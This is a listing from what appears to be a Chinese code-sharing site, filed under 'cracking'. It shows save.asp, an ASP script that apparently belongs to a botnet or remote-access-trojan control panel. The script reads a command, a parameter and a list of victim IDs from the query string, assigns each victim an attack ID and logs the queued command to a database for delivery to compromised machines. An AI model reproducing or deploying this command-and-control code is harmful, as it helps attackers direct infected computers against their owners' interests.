save.asp
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <%
  2. '// Save Commands
  3. '//HISTORY
  4. '10/08/2006
  5. ' - Started
  6. '01.04.2007
  7. ' - Response showing AttackId instead of 1 in success
  8. %>
  9. <!--#include file="db.asp" -->
  10. <%
  11. protected()
  12. Dim Command, Param, AttackID, VictimID
  13. Command = Request.Querystring("c")
  14. Param = Request.Querystring("p")
  15. Dim Victims
  16. Victims = Split(Request.Querystring("v"), ",")
  17. Dim i
  18. Dim values(8)
  19. For i = 0 To Ubound(Victims)
  20. VictimID = fm_NStr(Victims(i))
  21. AttackID = fm_RndNumeric2
  22. ' Error / missing data
  23. If AttackID = 0 Or VictimID = 0 Then 
  24. Response.Write NON_ERROR
  25. Response.End
  26. End If
  27. Dim RawCommand
  28. RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
  29. 'Log
  30. values(0) = "Command"
  31. values(1) = RawCommand
  32. values(2) = "text"
  33. values(3) = "AttackID"
  34. values(4) = AttackID
  35. values(5) = "text"
  36. values(6) = "VictimID"
  37. values(7) = VictimID
  38. values(8) = "number"
  39. fm_Insert "Log", values
  40. Next
  41. 'Last ID (normally only using for AttackId)
  42. Response.Write AttackID
  43. %>